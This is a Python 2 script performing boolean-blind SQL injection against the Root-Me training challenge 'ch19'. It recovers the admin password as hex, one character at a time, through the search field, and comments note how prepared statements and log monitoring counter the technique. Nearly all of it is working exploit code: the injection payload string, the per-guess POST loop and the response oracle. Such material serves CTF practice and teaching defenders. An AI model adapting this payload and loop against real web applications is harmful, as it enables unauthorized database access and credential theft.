# Python 2 script (print statement, list-returning range(), str.decode("hex")).
#
# Boolean-based blind SQL injection against the Root-Me training challenge
# "web-serveur/ch19": the search field `recherche` is used as an oracle to
# recover HEX(password) of the `admin` row one character at a time.
#
# What this demonstrates for a defender:
#   * The payload closes a quoted LIKE pattern and appends its own condition,
#     which only works if the application concatenates the search term into
#     the SQL text. Bound parameters (prepared statements) remove the oracle.
#   * Every guess is a separate POST, so extraction shows up in web / WAF logs
#     as a burst of near-identical search requests containing quotes,
#     `select count(*)` and `LIKE '<growing hex prefix>%'`.
#
# NOTE(review): the paste lost its indentation; the nesting below is
# reconstructed. The index increment and the sleep are assumed to run once
# per request, inside the inner loop.
import requests
import time

URL = "http://challenge01.root-me.org/web-serveur/ch19/?action=recherche"

# Hex digits of the password recovered so far (upper-case, as HEX() is matched
# against the A-F range below).
password = ""

#[0-9A-F]
# 0x30-0x39 are '0'-'9', 0x41-0x46 are 'A'-'F'. Concatenating two range()
# results with `+` only works on Python 2, where range() returns a list.
charset = range(0x30, 0x3a) + range(0x41, 0x47)

# Outer loop: one pass per recovered hex digit. It stops after a pass in which
# no character of the charset extends the known prefix.
found = True
while found:
    found = False
    index = 0
    # Inner loop: try each candidate digit until one matches or the charset
    # is exhausted.
    while not found and index < len(charset):
        character = chr(charset[index])
        # The comparison is done on HEX(password) because LIKE is not case
        # sensitive; comparing hex digits keeps the result unambiguous.
        # The trailing "AND 'a' LIKE 'a" re-balances the quote that the
        # original query is expected to append after the search term.
        payload = "faille%' AND (select count(*) from users where username='admin' and HEX(password) LIKE '"+ password + character +"%') > 0 AND 'a' LIKE 'a"
        #print payload,"\n"
        #break
        data = {'recherche': payload}
        #print data,"\n"
        #break
        # NOTE(review): plain HTTP and no timeout= argument, so a stalled
        # connection blocks the script indefinitely.
        r = requests.post(URL, data=data)
        #print r,"\n\n"
        resp = r.text
        #print resp
        #break
        # Oracle: this text is treated as "the injected condition was true".
        # Presumably it is part of a search result returned for "faille%";
        # the page content itself is not shown here.
        if "Correction faille / Vulnerability" in resp:
            password = password + character
            print password
            found = True
        index = index + 1
        time.sleep(0.1)  # for server sanity

# Turn the recovered hex digits back into the stored password string
# (the "hex" codec on str exists only on Python 2).
print password.decode("hex")